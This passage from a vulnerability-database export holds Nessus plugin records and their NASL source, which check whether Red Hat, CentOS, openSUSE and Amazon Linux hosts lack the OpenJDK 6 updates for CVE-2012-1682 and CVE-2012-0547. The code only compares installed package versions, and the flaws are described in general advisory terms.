the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that the Beans component in OpenJDK did not perform\npermission checks properly. An untrusted Java application or applet\ncould use this flaw to use classes from restricted packages, allowing\nit to bypass Java sandbox restrictions. (CVE-2012-1682)\n\nA hardening fix was applied to the AWT component in OpenJDK, removing\nfunctionality from the restricted SunToolkit class that was used in\ncombination with other flaws to bypass Java sandbox restrictions.\n(CVE-2012-0547)\n\nNote: If the web browser plug-in provided by the icedtea-web package\nwas installed, the issues exposed via Java applets could have been\nexploited without user interaction if a user visited a malicious\nwebsite.\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.11.4.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.", "edition": 26, "published": "2012-09-04T00:00:00", "title": "RHEL 6 : java-1.6.0-openjdk (RHSA-2012:1221)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "modified": "2012-09-04T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-devel", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-src", "cpe:/o:redhat:enterprise_linux:6.3", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-demo", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-javadoc", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-debuginfo"], "id": "REDHAT-RHSA-2012-1221.NASL", "href": "https://www.tenable.com/plugins/nessus/61767", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:1221. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61767);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-0547\", \"CVE-2012-1682\");\n script_xref(name:\"RHSA\", value:\"2012:1221\");\n\n script_name(english:\"RHEL 6 : java-1.6.0-openjdk (RHSA-2012:1221)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.6.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that the Beans component in OpenJDK did not perform\npermission checks properly. An untrusted Java application or applet\ncould use this flaw to use classes from restricted packages, allowing\nit to bypass Java sandbox restrictions. (CVE-2012-1682)\n\nA hardening fix was applied to the AWT component in OpenJDK, removing\nfunctionality from the restricted SunToolkit class that was used in\ncombination with other flaws to bypass Java sandbox restrictions.\n(CVE-2012-0547)\n\nNote: If the web browser plug-in provided by the icedtea-web package\nwas installed, the issues exposed via Java applets could have been\nexploited without user interaction if a user visited a malicious\nwebsite.\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.11.4.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n # http://www.oracle.com/technetwork/topics/security/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.oracle.com/technetwork/topics/security/whatsnew/index.html\"\n );\n # http://icedtea.classpath.org/hg/release/icedtea6-1.11/file/icedtea6-1.11.4/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a3d5272\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:1221\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0547\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1682\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:1221\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.49.1.11.4.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.49.1.11.4.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-debuginfo-1.6.0.0-1.49.1.11.4.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-debuginfo-1.6.0.0-1.49.1.11.4.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.49.1.11.4.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.49.1.11.4.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.49.1.11.4.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.49.1.11.4.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.49.1.11.4.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.49.1.11.4.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.49.1.11.4.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.49.1.11.4.el6_3\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-openjdk / java-1.6.0-openjdk-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:25:30", "description": "The icedtea-web Java plugin was updated to 1.11.4 to fix critical\nsecurity issues :\n\n - Security fixes\n\n - S7162476, CVE-2012-1682: XMLDecoder security issue via\n ClassFinder\n\n - S7163201, CVE-2012-0547: Simplify toolkit internals\n references\n\n - OpenJDK\n\n - S7182135: Impossible to use some editors directly\n\n - S7185678:\n java/awt/Menu/NullMenuLabelTest/NullMenuLabelTest.java\n failed with NPE", "edition": 18, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : java-1_6_0-openjdk (openSUSE-SU-2012:1175-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-debuginfo", "p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-demo-debuginfo", "p-cpe:/a:novell:opensuse:java-1_6_0-openjdk", "cpe:/o:novell:opensuse:12.1", "p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-devel-debuginfo", "p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-devel", "p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-debugsource", "p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-javadoc", "p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-demo", "p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-src"], "id": "OPENSUSE-2012-601.NASL", "href": "https://www.tenable.com/plugins/nessus/74754", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-601.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74754);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-0547\", \"CVE-2012-1682\");\n\n script_name(english:\"openSUSE Security Update : java-1_6_0-openjdk (openSUSE-SU-2012:1175-1)\");\n script_summary(english:\"Check for the openSUSE-2012-601 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The icedtea-web Java plugin was updated to 1.11.4 to fix critical\nsecurity issues :\n\n - Security fixes\n\n - S7162476, CVE-2012-1682: XMLDecoder security issue via\n ClassFinder\n\n - S7163201, CVE-2012-0547: Simplify toolkit internals\n references\n\n - OpenJDK\n\n - S7182135: Impossible to use some editors directly\n\n - S7185678:\n java/awt/Menu/NullMenuLabelTest/NullMenuLabelTest.java\n failed with NPE\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=777499\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-09/msg00062.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_6_0-openjdk packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-demo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"java-1_6_0-openjdk-1.6.0.0_b24.1.11.4-12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"java-1_6_0-openjdk-debuginfo-1.6.0.0_b24.1.11.4-12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"java-1_6_0-openjdk-debugsource-1.6.0.0_b24.1.11.4-12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"java-1_6_0-openjdk-demo-1.6.0.0_b24.1.11.4-12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"java-1_6_0-openjdk-demo-debuginfo-1.6.0.0_b24.1.11.4-12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"java-1_6_0-openjdk-devel-1.6.0.0_b24.1.11.4-12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"java-1_6_0-openjdk-devel-debuginfo-1.6.0.0_b24.1.11.4-12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"java-1_6_0-openjdk-javadoc-1.6.0.0_b24.1.11.4-12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"java-1_6_0-openjdk-src-1.6.0.0_b24.1.11.4-12.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_6_0-openjdk\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-30T22:27:58", "description": "It was discovered that the Beans component in OpenJDK did not perform\npermission checks properly. An untrusted Java application or applet\ncould use this flaw to use classes from restricted packages, allowing\nit to bypass Java sandbox restrictions. (CVE-2012-1682)\n\nA hardening fix was applied to the AWT component in OpenJDK, removing\nfunctionality from the restricted SunToolkit class that was used in\ncombination with other flaws to bypass Java sandbox restrictions.\n(CVE-2012-0547)", "edition": 27, "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : java-1.6.0-openjdk (ALAS-2012-119)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "modified": "2021-05-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:java-1.6.0-openjdk-src", "p-cpe:/a:amazon:linux:java-1.6.0-openjdk-devel", "p-cpe:/a:amazon:linux:java-1.6.0-openjdk", "p-cpe:/a:amazon:linux:java-1.6.0-openjdk-demo", "p-cpe:/a:amazon:linux:java-1.6.0-openjdk-javadoc", "cpe:/o:amazon:linux", "p-cpe:/a:amazon:linux:java-1.6.0-openjdk-debuginfo"], "id": "ALA_ALAS-2012-119.NASL", "href": "https://www.tenable.com/plugins/nessus/69609", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2012-119.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69609);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2012-0547\", \"CVE-2012-1682\");\n script_xref(name:\"ALAS\", value:\"2012-119\");\n script_xref(name:\"RHSA\", value:\"2012:1221\");\n\n script_name(english:\"Amazon Linux AMI : java-1.6.0-openjdk (ALAS-2012-119)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the Beans component in OpenJDK did not perform\npermission checks properly. An untrusted Java application or applet\ncould use this flaw to use classes from restricted packages, allowing\nit to bypass Java sandbox restrictions. (CVE-2012-1682)\n\nA hardening fix was applied to the AWT component in OpenJDK, removing\nfunctionality from the restricted SunToolkit class that was used in\ncombination with other flaws to bypass Java sandbox restrictions.\n(CVE-2012-0547)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2012-119.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update java-1.6.0-openjdk' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.6.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.6.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.6.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.6.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.6.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"java-1.6.0-openjdk-1.6.0.0-52.1.11.4.46.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.11.4.46.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-52.1.11.4.46.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-52.1.11.4.46.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.11.4.46.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-52.1.11.4.46.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-openjdk / java-1.6.0-openjdk-debuginfo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:27:56", "description": "Updated java-1.6.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that the Beans component in OpenJDK did not perform\npermission checks properly. An untrusted Java application or applet\ncould use this flaw to use classes from restricted packages, allowing\nit to bypass Java sandbox restrictions. (CVE-2012-1682)\n\nA hardening fix was applied to the AWT component in OpenJDK, removing\nfunctionality from the restricted SunToolkit class that was used in\ncombination with other flaws to bypass Java sandbox restrictions.\n(CVE-2012-0547)\n\nNote: If the web browser plug-in provided by the icedtea-web package\nwas installed, the issues exposed via Java applets could have been\nexploited without user interaction if a user visited a malicious\nwebsite.\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.11.4.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.", "edition": 25, "published": "2012-09-04T00:00:00", "title": "CentOS 6 : java-1.6.0-openjdk (CESA-2012:1221)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "modified": "2012-09-04T00:00:00", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:java-1.6.0-openjdk", "p-cpe:/a:centos:centos:java-1.6.0-openjdk-src", "p-cpe:/a:centos:centos:java-1.6.0-openjdk-javadoc", "p-cpe:/a:centos:centos:java-1.6.0-openjdk-demo", "p-cpe:/a:centos:centos:java-1.6.0-openjdk-devel"], "id": "CENTOS_RHSA-2012-1221.NASL", "href": "https://www.tenable.com/plugins/nessus/61753", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:1221 and \n# CentOS Errata and Security Advisory 2012:1221 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61753);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-0547\", \"CVE-2012-1682\");\n script_bugtraq_id(55336, 55339);\n script_xref(name:\"RHSA\", value:\"2012:1221\");\n\n script_name(english:\"CentOS 6 : java-1.6.0-openjdk (CESA-2012:1221)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.6.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that the Beans component in OpenJDK did not perform\npermission checks properly. An untrusted Java application or applet\ncould use this flaw to use classes from restricted packages, allowing\nit to bypass Java sandbox restrictions. (CVE-2012-1682)\n\nA hardening fix was applied to the AWT component in OpenJDK, removing\nfunctionality from the restricted SunToolkit class that was used in\ncombination with other flaws to bypass Java sandbox restrictions.\n(CVE-2012-0547)\n\nNote: If the web browser plug-in provided by the icedtea-web package\nwas installed, the issues exposed via Java applets could have been\nexploited without user interaction if a user visited a malicious\nwebsite.\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.11.4.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-September/018841.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?de935de4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1.6.0-openjdk packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-1682\");\n 